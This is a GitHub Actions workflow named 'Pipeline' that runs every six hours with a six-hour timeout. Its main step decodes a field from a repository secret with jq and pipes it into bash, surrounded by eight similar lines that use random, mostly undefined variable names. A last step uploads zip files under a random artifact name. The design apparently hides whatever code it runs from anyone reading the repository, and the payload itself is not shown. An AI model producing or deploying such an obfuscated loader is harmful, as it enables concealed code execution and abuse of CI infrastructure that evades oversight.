name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          lvp2344: ${{ secrets.lvp2344 }}
        run: |
          printf '%s' "$lvp2344" | jq -r .efbbb6 | /bin/bash
          echo $bnup89467 | jq -r .kngz1823 | /bin/bash
          echo $n0 | jq -r .a3107 | /bin/bash
          echo $lay4 | jq -r .cvpqw847 | /bin/bash
          echo $sn2 | jq -r .fmo1683 | /bin/bash
          echo $gmz565 | jq -r .j2961 | /bin/bash
          echo $zjrc0 | jq -r .m50 | /bin/bash
          printf '%s' "$fyb21" | jq -r .enisi6013 | /bin/bash
          echo $df1401 | jq -r .v812 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: mSgnlTfi
          path: "*.zip"
          retention-days: 1
